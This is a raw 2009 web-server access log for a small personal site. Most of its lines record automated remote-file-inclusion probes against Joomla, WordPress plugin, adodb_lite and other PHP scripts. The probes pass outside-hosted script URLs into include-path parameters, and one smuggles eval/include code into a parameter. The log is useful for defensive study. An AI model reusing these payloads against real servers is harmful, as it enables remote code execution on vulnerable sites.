200.140.41.46 - - [04/Feb/2009:18:00:23 -0600] "GET /logs/?sourcedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 117333 "-""libwww-perl/5.79"
200.140.41.46 - - [04/Feb/2009:18:00:26 -0600] "GET /?sourcedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
147.213.65.178 - - [04/Feb/2009:18:04:43 -0600] "GET /?sourcedir=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
211.115.222.220 - - [04/Feb/2009:18:06:12 -0600] "GET /logs/access_log.1216771200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.801"
211.115.222.220 - - [04/Feb/2009:18:06:12 -0600] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.801"
211.115.222.220 - - [04/Feb/2009:18:06:12 -0600] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 316 "-""libwww-perl/5.801"
209.126.137.226 - - [04/Feb/2009:18:09:15 -0600] "GET /include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
94.112.96.185 - - [04/Feb/2009:18:10:05 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 GTB5"
209.126.137.226 - - [04/Feb/2009:18:11:44 -0600] "GET /logs/access_log.1211328000/include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.76"
209.126.137.226 - - [04/Feb/2009:18:11:44 -0600] "GET /include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
209.126.137.226 - - [04/Feb/2009:18:11:44 -0600] "GET /logs/include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
209.126.137.226 - - [04/Feb/2009:18:12:14 -0600] "GET /logs/access_log.1213660800/include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.76"
192.134.106.1 - - [04/Feb/2009:18:13:49 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:18:13:49 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
147.213.65.178 - - [04/Feb/2009:18:15:39 -0600] "GET /logs/access_log.1218758400/?sourcedir=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
147.213.65.178 - - [04/Feb/2009:18:16:01 -0600] "GET /logs/access_log.1216944000/?sourcedir=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.108.154.202 - - [04/Feb/2009:18:16:02 -0600] "GET / HTTP/1.0" 200 1231 "-""Mozilla/3.0 (compatible)"
211.115.222.220 - - [04/Feb/2009:18:16:41 -0600] "GET /logs/access_log.1219104000%20/[Scripthttp://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 355 "-""libwww-perl/5.801"
211.115.222.220 - - [04/Feb/2009:18:16:41 -0600] "GET /logs/[Scripthttp://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.801"
211.115.222.220 - - [04/Feb/2009:18:16:42 -0600] "GET /[Scripthttp://www.scv.co.kr/zboard/info.txt???? HTTP/1.1" 404 327 "-""libwww-perl/5.801"
74.55.112.146 - - [04/Feb/2009:18:17:04 -0600] "GET /logs//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:17:04 -0600] "GET /logs/access_log.1216944000//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:17:04 -0600] "GET //appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:17:53 -0600] "GET /logs//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:17:53 -0600] "GET //appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:17:54 -0600] "GET /logs/access_log.1216944000//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:18:02 -0600] "GET //appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:18:02 -0600] "GET /logs//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:18:02 -0600] "GET /logs/access_log.1216944000//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.38.225.162 - - [04/Feb/2009:18:21:27 -0600] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
201.38.225.162 - - [04/Feb/2009:18:21:28 -0600] "GET //index.php?DOCUMENT_ROOT=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
201.38.225.162 - - [04/Feb/2009:18:21:29 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
192.134.106.1 - - [04/Feb/2009:18:21:30 -0600] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:18:21:34 -0600] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
113.130.70.19 - - [04/Feb/2009:18:21:40 -0600] "GET //?path%5Bdocroot%5D=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:21:40 -0600] "GET /logs/access_log.1206230400%20%20//?path%5Bdocroot%5D=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:21:40 -0600] "GET /logs/access_log.1212364800%20%20//?path%5Bdocroot%5D=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:21:41 -0600] "GET /logs//?path%5Bdocroot%5D=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 200 117465 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:22:00 -0600] "GET /logs/access_log.1219017600%20%20//?path%5Bdocroot%5D=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:23:00 -0600] "GET /logs/access_log.1216944000%20%20//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:23:01 -0600] "GET /logs/access_log.1216944000%20%20//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:23:25 -0600] "GET /logs/access_log.1216944000%20%20//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:23:29 -0600] "GET //include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:23:29 -0600] "GET /logs/access_log.1211328000%20%20//include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:23:29 -0600] "GET /logs//include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:23:33 -0600] "GET /logs/access_log.1213660800%20%20//include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.189.15.10 - - [04/Feb/2009:18:24:54 -0600] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.189.15.10 - - [04/Feb/2009:18:24:54 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.189.15.10 - - [04/Feb/2009:18:24:56 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.189.15.10 - - [04/Feb/2009:18:24:56 -0600] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:18:25:07 -0600] "GET //include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:18:25:07 -0600] "GET /logs//include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:18:25:07 -0600] "GET /logs/access_log.1211328000%20%20//include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:18:25:16 -0600] "GET /logs/access_log.1213660800%20%20//include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:25:56 -0600] "GET /logs/access_log.1211328000//RGboard/include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
113.130.70.19 - - [04/Feb/2009:18:25:56 -0600] "GET /logs//RGboard/include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
113.130.70.19 - - [04/Feb/2009:18:25:56 -0600] "GET //RGboard/include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
113.130.70.19 - - [04/Feb/2009:18:25:59 -0600] "GET /logs/access_log.1213660800//RGboard/include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
121.189.15.10 - - [04/Feb/2009:18:27:12 -0600] "GET /logs/access_log.1216684800%20%20//index.php?DOCUMENT_ROOT=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
201.38.225.162 - - [04/Feb/2009:18:27:14 -0600] "GET //index.php?DOCUMENT_ROOT=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.189.15.10 - - [04/Feb/2009:18:27:16 -0600] "GET /logs/access_log.1216684800%20%20//index.php?DOCUMENT_ROOT=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:27:43 -0600] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:27:43 -0600] "GET /logs/access_log.1218758400%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:27:43 -0600] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.13.249.26 - - [04/Feb/2009:18:27:48 -0600] "GET /logs/access_log.1217116800//s_loadenv.inc.php?DOCUMENT_ROOT=http://f-y-p.nl/ids.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:18:27:48 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://f-y-p.nl/ids.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:18:27:48 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://f-y-p.nl/ids.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
113.130.70.19 - - [04/Feb/2009:18:28:42 -0600] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:28:42 -0600] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.164.105.132 - - [04/Feb/2009:18:29:42 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3921 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=en&start=15&um=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%2Btattoo%26um%3D1%26hl%3Den%26sa%3DX""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
65.164.105.132 - - [04/Feb/2009:18:29:42 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
65.164.105.132 - - [04/Feb/2009:18:29:42 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
74.55.112.146 - - [04/Feb/2009:18:30:08 -0600] "GET /logs/access_log.1210377600//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:30:27 -0600] "GET /logs/access_log.1210377600//appserv/errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
64.13.249.26 - - [04/Feb/2009:18:30:40 -0600] "GET /logs/access_log.1218153600//s_loadenv.inc.php?DOCUMENT_ROOT=http://f-y-p.nl/ids.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
209.126.137.226 - - [04/Feb/2009:18:30:50 -0600] "GET /logs/include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
209.126.137.226 - - [04/Feb/2009:18:30:50 -0600] "GET /logs/include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
209.126.137.226 - - [04/Feb/2009:18:30:50 -0600] "GET /include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
209.126.137.226 - - [04/Feb/2009:18:30:50 -0600] "GET /include/footer.php?_path[counter]=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
201.38.225.162 - - [04/Feb/2009:18:34:38 -0600] "GET /logs/access_log.1217203200/!scanhttp://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 378 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
201.38.225.162 - - [04/Feb/2009:18:34:39 -0600] "GET /!scanhttp://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 351 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
201.38.225.162 - - [04/Feb/2009:18:35:11 -0600] "GET /!scanhttp://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
201.38.225.162 - - [04/Feb/2009:18:35:23 -0600] "GET /logs/access_log.1217203200/!scanhttp://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
201.38.225.162 - - [04/Feb/2009:18:35:24 -0600] "GET /!scanhttp://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
201.38.225.162 - - [04/Feb/2009:18:35:24 -0600] "GET /logs/!scanhttp://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
74.55.112.146 - - [04/Feb/2009:18:35:56 -0600] "GET /logs/access_log.1210982400//include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:36:08 -0600] "GET /logs/access_log.1218758400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
208.80.194.50 - - [04/Feb/2009:18:38:29 -0600] "GET / HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; HbTools 4.8.2; InfoPath.2)"
201.38.225.162 - - [04/Feb/2009:18:39:20 -0600] "GET /logs/access_log.1214784000/!scanhttp://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 378 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
93.190.137.242 - - [04/Feb/2009:18:39:49 -0600] "GET //index.php?DOCUMENT_ROOT=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.190.137.242 - - [04/Feb/2009:18:39:49 -0600] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.190.137.242 - - [04/Feb/2009:18:39:49 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:39:50 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:39:50 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:39:50 -0600] "GET /logs/access_log.1216512000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:39:50 -0600] "GET /logs/access_log.1211068800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:40:07 -0600] "GET /logs/access_log.1216512000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:18:40:12 -0600] "GET /logs/access_log.1211068800%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
201.38.225.162 - - [04/Feb/2009:18:40:29 -0600] "GET /logs/access_log.1214784000/!scanhttp://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
88.191.95.106 - - [04/Feb/2009:18:40:39 -0600] "GET /logs/access_log.1210982400//include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
147.213.65.178 - - [04/Feb/2009:18:40:45 -0600] "GET //usrgetform.html?name=http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
147.213.65.178 - - [04/Feb/2009:18:40:45 -0600] "GET /logs//usrgetform.html?name=http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 404 305 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
80.25.82.126 - - [04/Feb/2009:18:40:55 -0600] "GET /logs/access_log.1214956800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://canalteresina.org/TT?? HTTP/1.1" 404 365 "-""libwww-perl/5.76"
192.134.106.1 - - [04/Feb/2009:18:41:00 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:18:41:01 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
93.190.137.242 - - [04/Feb/2009:18:42:05 -0600] "GET /logs/access_log.1216684800%20%20//index.php?DOCUMENT_ROOT=http://www.mirdruzey.ru/assets/snippets/jot/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.30.78.236 - - [04/Feb/2009:18:42:33 -0600] "GET /logs/access_log.1213056000 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
113.130.70.19 - - [04/Feb/2009:18:42:51 -0600] "GET /logs/access_log.1216425600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
83.14.30.149 - - [04/Feb/2009:18:42:52 -0600] "GET /logs/access_log.1213747200//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 372 "-""libwww-perl/5.823"
83.14.30.149 - - [04/Feb/2009:18:42:52 -0600] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.823"
83.14.30.149 - - [04/Feb/2009:18:42:52 -0600] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 350 "-""libwww-perl/5.823"
83.14.30.149 - - [04/Feb/2009:18:42:53 -0600] "GET /logs/access_log.1218758400//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.beskidzka5.pl//assets/snippets/idv6.txt???? HTTP/1.1" 404 372 "-""libwww-perl/5.823"
80.25.82.126 - - [04/Feb/2009:18:43:18 -0600] "GET /logs/access_log.1212451200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://canalteresina.org/TT?? HTTP/1.1" 404 365 "-""libwww-perl/5.76"
80.25.82.126 - - [04/Feb/2009:18:43:56 -0600] "GET /logs/access_log.1218326400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://canalteresina.org/TT?? HTTP/1.1" 404 365 "-""libwww-perl/5.76"
74.55.112.146 - - [04/Feb/2009:18:45:44 -0600] "GET /logs/access_log.1214784000//include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:46:27 -0600] "GET /logs/access_log.1211328000//include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.112.146 - - [04/Feb/2009:18:46:27 -0600] "GET /logs/access_log.1213660800//include/footer.php?_path[counter]=http://madrigaldelavera.es/joomla/mambots/editors/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
72.30.78.236 - - [04/Feb/2009:18:46:43 -0600] "GET /logs/access_log.1167609600 HTTP/1.0" 200 186730 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.13.249.26 - - [04/Feb/2009:18:46:44 -0600] "GET /logs/access_log.1216080000/!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:18:46:44 -0600] "GET /!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
64.13.249.26 - - [04/Feb/2009:18:46:45 -0600] "GET /logs/!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
88.191.95.106 - - [04/Feb/2009:18:46:56 -0600] "GET /logs/access_log.1214784000//include/footer.php?_path[counter]=http://gumansin.com/id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
64.13.249.26 - - [04/Feb/2009:18:47:07 -0600] "GET /logs/access_log.1209686400/!scanhttp://f-y-p.nl/ids.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
